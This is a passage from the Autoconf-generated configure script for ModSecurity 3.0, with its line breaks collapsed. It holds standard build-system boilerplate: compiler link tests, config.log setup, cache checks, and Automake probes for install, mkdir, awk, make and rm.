conftest.$ac_objext conftest$ac_exeext if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>conftest.err ac_status=$? if test -s conftest.err; then grep -v '^ *+' conftest.err >conftest.er1 cat conftest.er1 >&5 mv -f conftest.er1 conftest.err fi $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } && { test -z "$ac_cxx_werror_flag" || test ! -s conftest.err } && test -s conftest$ac_exeext && { test "$cross_compiling" = yes || test -x conftest$ac_exeext }; then : ac_retval=0 else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 ac_retval=1 fi # Delete the IPA/IPO (Inter Procedural Analysis/Optimization) information # created by the PGI compiler (conftest_ipa8_conftest.oo), as it would # interfere with the next link command; also delete a directory that is # left behind by Apple's compiler. We do this before executing the actions. rm -rf conftest.dSYM conftest_ipa8_conftest.oo eval $as_lineno_stack; ${as_lineno_stack:+:} unset as_lineno as_fn_set_status $ac_retval } # ac_fn_cxx_try_link cat >config.log <<_ACEOF This file contains any messages produced by compilers while running configure, to aid debugging if configure makes a mistake. It was created by modsecurity $as_me 3.0, which was generated by GNU Autoconf 2.69. Invocation command line was $ $0 $@ _ACEOF exec 5>>config.log { cat <<_ASUNAME ## --------- ## ## Platform. ## ## --------- ## hostname = `(hostname || uname -n) 2>/dev/null | sed 1q` uname -m = `(uname -m) 2>/dev/null || echo unknown` uname -r = `(uname -r) 2>/dev/null || echo unknown` uname -s = `(uname -s) 2>/dev/null || echo unknown` uname -v = `(uname -v) 2>/dev/null || echo unknown` /usr/bin/uname -p = `(/usr/bin/uname -p) 2>/dev/null || echo unknown` /bin/uname -X = `(/bin/uname -X) 2>/dev/null || echo unknown` /bin/arch = `(/bin/arch) 2>/dev/null || echo unknown` /usr/bin/arch -k = `(/usr/bin/arch -k) 2>/dev/null || echo unknown` /usr/convex/getsysinfo = `(/usr/convex/getsysinfo) 2>/dev/null || echo unknown` /usr/bin/hostinfo = `(/usr/bin/hostinfo) 2>/dev/null || echo unknown` /bin/machine = `(/bin/machine) 2>/dev/null || echo unknown` /usr/bin/oslevel = `(/usr/bin/oslevel) 2>/dev/null || echo unknown` /bin/universe = `(/bin/universe) 2>/dev/null || echo unknown` _ASUNAME as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. $as_echo "PATH: $as_dir" done IFS=$as_save_IFS } >&5 cat >&5 <<_ACEOF ## ----------- ## ## Core tests. ## ## ----------- ## _ACEOF # Keep a trace of the command line. # Strip out --no-create and --no-recursion so they do not pile up. # Strip out --silent because we don't want to record it for future runs. # Also quote any args containing shell meta-characters. # Make two passes to allow for proper duplicate-argument suppression. ac_configure_args= ac_configure_args0= ac_configure_args1= ac_must_keep_next=false for ac_pass in 1 2 do for ac_arg do case $ac_arg in -no-create | --no-c* | -n | -no-recursion | --no-r*) continue ;; -q | -quiet | --quiet | --quie | --qui | --qu | --q \ | -silent | --silent | --silen | --sile | --sil) continue ;; *\'*) ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;; esac case $ac_pass in 1) as_fn_append ac_configure_args0 " '$ac_arg'" ;; 2) as_fn_append ac_configure_args1 " '$ac_arg'" if test $ac_must_keep_next = true; then ac_must_keep_next=false # Got value, back to normal. else case $ac_arg in *=* | --config-cache | -C | -disable-* | --disable-* \ | -enable-* | --enable-* | -gas | --g* | -nfp | --nf* \ | -q | -quiet | --q* | -silent | --sil* | -v | -verb* \ | -with-* | --with-* | -without-* | --without-* | --x) case "$ac_configure_args0 " in "$ac_configure_args1"*" '$ac_arg' "* ) continue ;; esac ;; -* ) ac_must_keep_next=true ;; esac fi as_fn_append ac_configure_args " '$ac_arg'" ;; esac done done { ac_configure_args0=; unset ac_configure_args0;} { ac_configure_args1=; unset ac_configure_args1;} # When interrupted or exit'd, cleanup temporary files, and complete # config.log. We remove comments because anyway the quotes in there # would cause problems or look ugly. # WARNING: Use '\'' to represent an apostrophe within the trap. # WARNING: Do not start the trap code with a newline, due to a FreeBSD 4.0 bug. trap 'exit_status=$? # Save into config.log some information that might help in debugging. { echo $as_echo "## ---------------- ## ## Cache variables. ## ## ---------------- ##" echo # The following way of writing the cache mishandles newlines in values, ( for ac_var in `(set) 2>&1 | sed -n '\''s/^\([a-zA-Z_][a-zA-Z0-9_]*\)=.*/\1/p'\''`; do eval ac_val=\$$ac_var case $ac_val in #( *${as_nl}*) case $ac_var in #( *_cv_*) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: cache variable $ac_var contains a newline" >&5 $as_echo "$as_me: WARNING: cache variable $ac_var contains a newline" >&2;} ;; esac case $ac_var in #( _ | IFS | as_nl) ;; #( BASH_ARGV | BASH_SOURCE) eval $ac_var= ;; #( *) { eval $ac_var=; unset $ac_var;} ;; esac ;; esac done (set) 2>&1 | case $as_nl`(ac_space='\'' '\''; set) 2>&1` in #( *${as_nl}ac_space=\ *) sed -n \ "s/'\''/'\''\\\\'\'''\''/g; s/^\\([_$as_cr_alnum]*_cv_[_$as_cr_alnum]*\\)=\\(.*\\)/\\1='\''\\2'\''/p" ;; #( *) sed -n "/^[_$as_cr_alnum]*_cv_[_$as_cr_alnum]*=/p" ;; esac | sort ) echo $as_echo "## ----------------- ## ## Output variables. ## ## ----------------- ##" echo for ac_var in $ac_subst_vars do eval ac_val=\$$ac_var case $ac_val in *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac $as_echo "$ac_var='\''$ac_val'\''" done | sort echo if test -n "$ac_subst_files"; then $as_echo "## ------------------- ## ## File substitutions. ## ## ------------------- ##" echo for ac_var in $ac_subst_files do eval ac_val=\$$ac_var case $ac_val in *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;; esac $as_echo "$ac_var='\''$ac_val'\''" done | sort echo fi if test -s confdefs.h; then $as_echo "## ----------- ## ## confdefs.h. ## ## ----------- ##" echo cat confdefs.h echo fi test "$ac_signal" != 0 && $as_echo "$as_me: caught signal $ac_signal" $as_echo "$as_me: exit $exit_status" } >&5 rm -f core *.core core.conftest.* && rm -f -r conftest* confdefs* conf$$* $ac_clean_files && exit $exit_status ' 0 for ac_signal in 1 2 13 15; do trap 'ac_signal='$ac_signal'; as_fn_exit 1' $ac_signal done ac_signal=0 # confdefs.h avoids OS command line length limits that DEFS can exceed. rm -f -r conftest* confdefs.h $as_echo "/* confdefs.h */" > confdefs.h # Predefined preprocessor variables. cat >>confdefs.h <<_ACEOF #define PACKAGE_NAME "$PACKAGE_NAME" _ACEOF cat >>confdefs.h <<_ACEOF #define PACKAGE_TARNAME "$PACKAGE_TARNAME" _ACEOF cat >>confdefs.h <<_ACEOF #define PACKAGE_VERSION "$PACKAGE_VERSION" _ACEOF cat >>confdefs.h <<_ACEOF #define PACKAGE_STRING "$PACKAGE_STRING" _ACEOF cat >>confdefs.h <<_ACEOF #define PACKAGE_BUGREPORT "$PACKAGE_BUGREPORT" _ACEOF cat >>confdefs.h <<_ACEOF #define PACKAGE_URL "$PACKAGE_URL" _ACEOF # Let the site file select an alternate cache file if it wants to. # Prefer an explicitly selected file to automatically selected ones. ac_site_file1=NONE ac_site_file2=NONE if test -n "$CONFIG_SITE"; then # We do not want a PATH search for config.site. case $CONFIG_SITE in #(( -*) ac_site_file1=./$CONFIG_SITE;; */*) ac_site_file1=$CONFIG_SITE;; *) ac_site_file1=./$CONFIG_SITE;; esac elif test "x$prefix" != xNONE; then ac_site_file1=$prefix/share/config.site ac_site_file2=$prefix/etc/config.site else ac_site_file1=$ac_default_prefix/share/config.site ac_site_file2=$ac_default_prefix/etc/config.site fi for ac_site_file in "$ac_site_file1" "$ac_site_file2" do test "x$ac_site_file" = xNONE && continue if test /dev/null != "$ac_site_file" && test -r "$ac_site_file"; then { $as_echo "$as_me:${as_lineno-$LINENO}: loading site script $ac_site_file" >&5 $as_echo "$as_me: loading site script $ac_site_file" >&6;} sed 's/^/| /' "$ac_site_file" >&5 . "$ac_site_file" \ || { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "failed to load site script $ac_site_file See \`config.log' for more details" "$LINENO" 5; } fi done if test -r "$cache_file"; then # Some versions of bash will fail to source /dev/null (special files # actually), so we avoid doing that. DJGPP emulates it as a regular file. if test /dev/null != "$cache_file" && test -f "$cache_file"; then { $as_echo "$as_me:${as_lineno-$LINENO}: loading cache $cache_file" >&5 $as_echo "$as_me: loading cache $cache_file" >&6;} case $cache_file in [\\/]* | ?:[\\/]* ) . "$cache_file";; *) . "./$cache_file";; esac fi else { $as_echo "$as_me:${as_lineno-$LINENO}: creating cache $cache_file" >&5 $as_echo "$as_me: creating cache $cache_file" >&6;} >$cache_file fi # Check that the precious variables saved in the cache have kept the same # value. ac_cache_corrupted=false for ac_var in $ac_precious_vars; do eval ac_old_set=\$ac_cv_env_${ac_var}_set eval ac_new_set=\$ac_env_${ac_var}_set eval ac_old_val=\$ac_cv_env_${ac_var}_value eval ac_new_val=\$ac_env_${ac_var}_value case $ac_old_set,$ac_new_set in set,) { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5 $as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;} ac_cache_corrupted=: ;; ,set) { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was not set in the previous run" >&5 $as_echo "$as_me: error: \`$ac_var' was not set in the previous run" >&2;} ac_cache_corrupted=: ;; ,);; *) if test "x$ac_old_val" != "x$ac_new_val"; then # differences in whitespace do not lead to failure. ac_old_val_w=`echo x $ac_old_val` ac_new_val_w=`echo x $ac_new_val` if test "$ac_old_val_w" != "$ac_new_val_w"; then { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' has changed since the previous run:" >&5 $as_echo "$as_me: error: \`$ac_var' has changed since the previous run:" >&2;} ac_cache_corrupted=: else { $as_echo "$as_me:${as_lineno-$LINENO}: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&5 $as_echo "$as_me: warning: ignoring whitespace changes in \`$ac_var' since the previous run:" >&2;} eval $ac_var=\$ac_old_val fi { $as_echo "$as_me:${as_lineno-$LINENO}: former value: \`$ac_old_val'" >&5 $as_echo "$as_me: former value: \`$ac_old_val'" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: current value: \`$ac_new_val'" >&5 $as_echo "$as_me: current value: \`$ac_new_val'" >&2;} fi;; esac # Pass precious variables to config.status. if test "$ac_new_set" = set; then case $ac_new_val in *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;; *) ac_arg=$ac_var=$ac_new_val ;; esac case " $ac_configure_args " in *" '$ac_arg' "*) ;; # Avoid dups. Use of quotes ensures accuracy. *) as_fn_append ac_configure_args " '$ac_arg'" ;; esac fi done if $ac_cache_corrupted; then { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} { $as_echo "$as_me:${as_lineno-$LINENO}: error: changes in the environment can compromise the build" >&5 $as_echo "$as_me: error: changes in the environment can compromise the build" >&2;} as_fn_error $? "run \`make distclean' and/or \`rm $cache_file' and start over" "$LINENO" 5 fi ## -------------------- ## ## Main body of script. ## ## -------------------- ## ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu # General definitions # General automake options. am__api_version='1.16' ac_aux_dir= for ac_dir in "$srcdir" "$srcdir/.." "$srcdir/../.."; do if test -f "$ac_dir/install-sh"; then ac_aux_dir=$ac_dir ac_install_sh="$ac_aux_dir/install-sh -c" break elif test -f "$ac_dir/install.sh"; then ac_aux_dir=$ac_dir ac_install_sh="$ac_aux_dir/install.sh -c" break elif test -f "$ac_dir/shtool"; then ac_aux_dir=$ac_dir ac_install_sh="$ac_aux_dir/shtool install -c" break fi done if test -z "$ac_aux_dir"; then as_fn_error $? "cannot find install-sh, install.sh, or shtool in \"$srcdir\" \"$srcdir/..\" \"$srcdir/../..\"" "$LINENO" 5 fi # These three variables are undocumented and unsupported, # and are intended to be withdrawn in a future Autoconf release. # They can cause serious problems if a builder's source tree is in a directory # whose full name contains unusual characters. ac_config_guess="$SHELL $ac_aux_dir/config.guess" # Please don't use this var. ac_config_sub="$SHELL $ac_aux_dir/config.sub" # Please don't use this var. ac_configure="$SHELL $ac_aux_dir/configure" # Please don't use this var. # Find a good install program. We prefer a C program (faster), # so one script is as good as another. But avoid the broken or # incompatible versions: # SysV /etc/install, /usr/sbin/install # SunOS /usr/etc/install # IRIX /sbin/install # AIX /bin/install # AmigaOS /C/install, which installs bootblocks on floppy discs # AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag # AFS /usr/afsws/bin/install, which mishandles nonexistent args # SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" # OS/2's system install, which has a completely different semantic # ./install, which can be erroneously created by make from ./install.sh. # Reject install programs that cannot install multiple files. { $as_echo "$as_me:${as_lineno-$LINENO}: checking for a BSD-compatible install" >&5 $as_echo_n "checking for a BSD-compatible install... " >&6; } if test -z "$INSTALL"; then if ${ac_cv_path_install+:} false; then : $as_echo_n "(cached) " >&6 else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. # Account for people who put trailing slashes in PATH elements. case $as_dir/ in #(( ./ | .// | /[cC]/* | \ /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ ?:[\\/]os2[\\/]install[\\/]* | ?:[\\/]OS2[\\/]INSTALL[\\/]* | \ /usr/ucb/* ) ;; *) # OSF1 and SCO ODT 3.0 have their own names for install. # Don't use installbsd from OSF since it installs stuff as root # by default. for ac_prog in ginstall scoinst install; do for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_prog$ac_exec_ext"; then if test $ac_prog = install && grep dspmsg "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then # AIX install. It has an incompatible calling convention. : elif test $ac_prog = install && grep pwplus "$as_dir/$ac_prog$ac_exec_ext" >/dev/null 2>&1; then # program-specific install script used by HP pwplus--don't use. : else rm -rf conftest.one conftest.two conftest.dir echo one > conftest.one echo two > conftest.two mkdir conftest.dir if "$as_dir/$ac_prog$ac_exec_ext" -c conftest.one conftest.two "`pwd`/conftest.dir" && test -s conftest.one && test -s conftest.two && test -s conftest.dir/conftest.one && test -s conftest.dir/conftest.two then ac_cv_path_install="$as_dir/$ac_prog$ac_exec_ext -c" break 3 fi fi fi done done ;; esac done IFS=$as_save_IFS rm -rf conftest.one conftest.two conftest.dir fi if test "${ac_cv_path_install+set}" = set; then INSTALL=$ac_cv_path_install else # As a last resort, use the slow shell script. Don't cache a # value for INSTALL within a source directory, because that will # break other packages using the cache if that directory is # removed, or if the value is a relative name. INSTALL=$ac_install_sh fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $INSTALL" >&5 $as_echo "$INSTALL" >&6; } # Use test -z because SunOS4 sh mishandles braces in ${var-val}. # It thinks the first close brace ends the variable substitution. test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether build environment is sane" >&5 $as_echo_n "checking whether build environment is sane... " >&6; } # Reject unsafe characters in $srcdir or the absolute working directory # name. Accept space and tab only in the latter. am_lf=' ' case `pwd` in *[\\\"\#\$\&\'\`$am_lf]*) as_fn_error $? "unsafe absolute working directory name" "$LINENO" 5;; esac case $srcdir in *[\\\"\#\$\&\'\`$am_lf\ \ ]*) as_fn_error $? "unsafe srcdir value: '$srcdir'" "$LINENO" 5;; esac # Do 'set' in a subshell so we don't clobber the current shell's # arguments. Must try -L first in case configure is actually a # symlink; some systems play weird games with the mod time of symlinks # (eg FreeBSD returns the mod time of the symlink's containing # directory). if ( am_has_slept=no for am_try in 1 2; do echo "timestamp, slept: $am_has_slept" > conftest.file set X `ls -Lt "$srcdir/configure" conftest.file 2> /dev/null` if test "$*" = "X"; then # -L didn't work. set X `ls -t "$srcdir/configure" conftest.file` fi if test "$*" != "X $srcdir/configure conftest.file" \ && test "$*" != "X conftest.file $srcdir/configure"; then # If neither matched, then we have a broken ls. This can happen # if, for instance, CONFIG_SHELL is bash and it inherits a # broken ls alias from the environment. This has actually # happened. Such a system could not be considered "sane". as_fn_error $? "ls -t appears to fail. Make sure there is not a broken alias in your environment" "$LINENO" 5 fi if test "$2" = conftest.file || test $am_try -eq 2; then break fi # Just in case. sleep 1 am_has_slept=yes done test "$2" = conftest.file ) then # Ok. : else as_fn_error $? "newly created file is older than distributed files! Check your system clock" "$LINENO" 5 fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } # If we didn't sleep, we still need to ensure time stamps of config.status and # generated files are strictly newer. am_sleep_pid= if grep 'slept: no' conftest.file >/dev/null 2>&1; then ( sleep 1 ) & am_sleep_pid=$! fi rm -f conftest.file test "$program_prefix" != NONE && program_transform_name="s&^&$program_prefix&;$program_transform_name" # Use a double $ so make ignores it. test "$program_suffix" != NONE && program_transform_name="s&\$&$program_suffix&;$program_transform_name" # Double any \ or $. # By default was `s,x,x', remove it if useless. ac_script='s/[\\$]/&&/g;s/;s,x,x,$//' program_transform_name=`$as_echo "$program_transform_name" | sed "$ac_script"` # Expand $ac_aux_dir to an absolute path. am_aux_dir=`cd "$ac_aux_dir" && pwd` if test x"${MISSING+set}" != xset; then case $am_aux_dir in *\ * | *\ *) MISSING="\${SHELL} \"$am_aux_dir/missing\"" ;; *) MISSING="\${SHELL} $am_aux_dir/missing" ;; esac fi # Use eval to expand $SHELL if eval "$MISSING --is-lightweight"; then am_missing_run="$MISSING " else am_missing_run= { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: 'missing' script is too old or missing" >&5 $as_echo "$as_me: WARNING: 'missing' script is too old or missing" >&2;} fi if test x"${install_sh+set}" != xset; then case $am_aux_dir in *\ * | *\ *) install_sh="\${SHELL} '$am_aux_dir/install-sh'" ;; *) install_sh="\${SHELL} $am_aux_dir/install-sh" esac fi # Installed binaries are usually stripped using 'strip' when the user # run "make install-strip". However 'strip' might not be the right # tool to use in cross-compilation environments, therefore Automake # will honor the 'STRIP' environment variable to overrule this program. if test "$cross_compiling" != no; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}strip", so it can be a program name with args. set dummy ${ac_tool_prefix}strip; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_STRIP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$STRIP"; then ac_cv_prog_STRIP="$STRIP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_STRIP="${ac_tool_prefix}strip" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi STRIP=$ac_cv_prog_STRIP if test -n "$STRIP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $STRIP" >&5 $as_echo "$STRIP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_STRIP"; then ac_ct_STRIP=$STRIP # Extract the first word of "strip", so it can be a program name with args. set dummy strip; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_STRIP+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_STRIP"; then ac_cv_prog_ac_ct_STRIP="$ac_ct_STRIP" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_STRIP="strip" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_STRIP=$ac_cv_prog_ac_ct_STRIP if test -n "$ac_ct_STRIP"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_STRIP" >&5 $as_echo "$ac_ct_STRIP" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_STRIP" = x; then STRIP=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac STRIP=$ac_ct_STRIP fi else STRIP="$ac_cv_prog_STRIP" fi fi INSTALL_STRIP_PROGRAM="\$(install_sh) -c -s" { $as_echo "$as_me:${as_lineno-$LINENO}: checking for a thread-safe mkdir -p" >&5 $as_echo_n "checking for a thread-safe mkdir -p... " >&6; } if test -z "$MKDIR_P"; then if ${ac_cv_path_mkdir+:} false; then : $as_echo_n "(cached) " >&6 else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH$PATH_SEPARATOR/opt/sfw/bin do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_prog in mkdir gmkdir; do for ac_exec_ext in '' $ac_executable_extensions; do as_fn_executable_p "$as_dir/$ac_prog$ac_exec_ext" || continue case `"$as_dir/$ac_prog$ac_exec_ext" --version 2>&1` in #( 'mkdir (GNU coreutils) '* | \ 'mkdir (coreutils) '* | \ 'mkdir (fileutils) '4.1*) ac_cv_path_mkdir=$as_dir/$ac_prog$ac_exec_ext break 3;; esac done done done IFS=$as_save_IFS fi test -d ./--version && rmdir ./--version if test "${ac_cv_path_mkdir+set}" = set; then MKDIR_P="$ac_cv_path_mkdir -p" else # As a last resort, use the slow shell script. Don't cache a # value for MKDIR_P within a source directory, because that will # break other packages using the cache if that directory is # removed, or if the value is a relative name. MKDIR_P="$ac_install_sh -d" fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $MKDIR_P" >&5 $as_echo "$MKDIR_P" >&6; } for ac_prog in gawk mawk nawk awk do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_AWK+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$AWK"; then ac_cv_prog_AWK="$AWK" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_AWK="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi AWK=$ac_cv_prog_AWK if test -n "$AWK"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $AWK" >&5 $as_echo "$AWK" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$AWK" && break done { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} sets \$(MAKE)" >&5 $as_echo_n "checking whether ${MAKE-make} sets \$(MAKE)... " >&6; } set x ${MAKE-make} ac_make=`$as_echo "$2" | sed 's/+/p/g; s/[^a-zA-Z0-9_]/_/g'` if eval \${ac_cv_prog_make_${ac_make}_set+:} false; then : $as_echo_n "(cached) " >&6 else cat >conftest.make <<\_ACEOF SHELL = /bin/sh all: @echo '@@@%%%=$(MAKE)=@@@%%%' _ACEOF # GNU make sometimes prints "make[1]: Entering ...", which would confuse us. case `${MAKE-make} -f conftest.make 2>/dev/null` in *@@@%%%=?*=@@@%%%*) eval ac_cv_prog_make_${ac_make}_set=yes;; *) eval ac_cv_prog_make_${ac_make}_set=no;; esac rm -f conftest.make fi if eval test \$ac_cv_prog_make_${ac_make}_set = yes; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } SET_MAKE= else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } SET_MAKE="MAKE=${MAKE-make}" fi rm -rf .tst 2>/dev/null mkdir .tst 2>/dev/null if test -d .tst; then am__leading_dot=. else am__leading_dot=_ fi rmdir .tst 2>/dev/null # Check whether --enable-silent-rules was given. if test "${enable_silent_rules+set}" = set; then : enableval=$enable_silent_rules; fi case $enable_silent_rules in # ((( yes) AM_DEFAULT_VERBOSITY=0;; no) AM_DEFAULT_VERBOSITY=1;; *) AM_DEFAULT_VERBOSITY=1;; esac am_make=${MAKE-make} { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $am_make supports nested variables" >&5 $as_echo_n "checking whether $am_make supports nested variables... " >&6; } if ${am_cv_make_support_nested_variables+:} false; then : $as_echo_n "(cached) " >&6 else if $as_echo 'TRUE=$(BAR$(V)) BAR0=false BAR1=true V=1 am__doit: @$(TRUE) .PHONY: am__doit' | $am_make -f - >/dev/null 2>&1; then am_cv_make_support_nested_variables=yes else am_cv_make_support_nested_variables=no fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_make_support_nested_variables" >&5 $as_echo "$am_cv_make_support_nested_variables" >&6; } if test $am_cv_make_support_nested_variables = yes; then AM_V='$(V)' AM_DEFAULT_V='$(AM_DEFAULT_VERBOSITY)' else AM_V=$AM_DEFAULT_VERBOSITY AM_DEFAULT_V=$AM_DEFAULT_VERBOSITY fi AM_BACKSLASH='\' if test "`cd $srcdir && pwd`" != "`pwd`"; then # Use -I$(srcdir) only when $(srcdir) != ., so that make's output # is not polluted with repeated "-I." am__isrc=' -I$(srcdir)' # test to see if srcdir already configured if test -f $srcdir/config.status; then as_fn_error $? "source directory already configured; run \"make distclean\" there first" "$LINENO" 5 fi fi # test whether we have cygpath if test -z "$CYGPATH_W"; then if (cygpath --version) >/dev/null 2>/dev/null; then CYGPATH_W='cygpath -w' else CYGPATH_W=echo fi fi # Define the identity of the package. PACKAGE='modsecurity' VERSION='3.0' cat >>confdefs.h <<_ACEOF #define PACKAGE "$PACKAGE" _ACEOF cat >>confdefs.h <<_ACEOF #define VERSION "$VERSION" _ACEOF # Some tools Automake needs. ACLOCAL=${ACLOCAL-"${am_missing_run}aclocal-${am__api_version}"} AUTOCONF=${AUTOCONF-"${am_missing_run}autoconf"} AUTOMAKE=${AUTOMAKE-"${am_missing_run}automake-${am__api_version}"} AUTOHEADER=${AUTOHEADER-"${am_missing_run}autoheader"} MAKEINFO=${MAKEINFO-"${am_missing_run}makeinfo"} # For better backward compatibility. To be removed once Automake 1.9.x # dies out for good. For more background, see: # # mkdir_p='$(MKDIR_P)' # We need awk for the "check" target (and possibly the TAP driver). The # system "awk" is bad on some platforms. # Always define AMTAR for backward compatibility. Yes, it's still used # in the wild :-( We should find a proper way to deprecate it ... AMTAR='$${TAR-tar}' # We'll loop over all known methods to create a tar archive until one works. _am_tools='gnutar pax cpio none' am__tar='$${TAR-tar} chof - "$$tardir"' am__untar='$${TAR-tar} xf -' # POSIX will say in a future version that running "rm -f" with no argument # is OK; and we want to be able to make that assumption in our Makefile # recipes. So use an aggressive probe to check that the usage we want is # actually supported "in the wild" to an acceptable degree. # See automake bug#10828. # To make any issue more visible, cause the running configure to be aborted # by default if the 'rm' program in use doesn't match our expectations; the # user can still override this though. if rm -f && rm -fr && rm -rf; then : OK; else cat >&2 <<'END' Oops! Your 'rm' program seems unable to run without file operands specified on the command line, even when the '-f' option is present. This is contrary to the behaviour of most rm programs out there, and not conforming with the upcoming POSIX standard: Please tell bug-automake@gnu.org about your system, including the value of your $PATH and any error possibly output before this message. This can help us improve future automake versions. END if test x"$ACCEPT_INFERIOR_RM_PROGRAM" = x"yes"; then echo 'Configuration will proceed anyway, since you have set the' >&2 echo 'ACCEPT_INFERIOR_RM_PROGRAM variable to "yes"' >&2 echo >&2 else cat >&2 <<'END' Aborting the configuration process, to ensure you take notice of the issue. You can download and install GNU coreutils to get an 'rm' implementation that behaves properly: . If you want to complete the configuration process using your problematic 'rm' anyway, export the environment variable ACCEPT_INFERIOR_RM_PROGRAM to "yes", and re-run configure. END 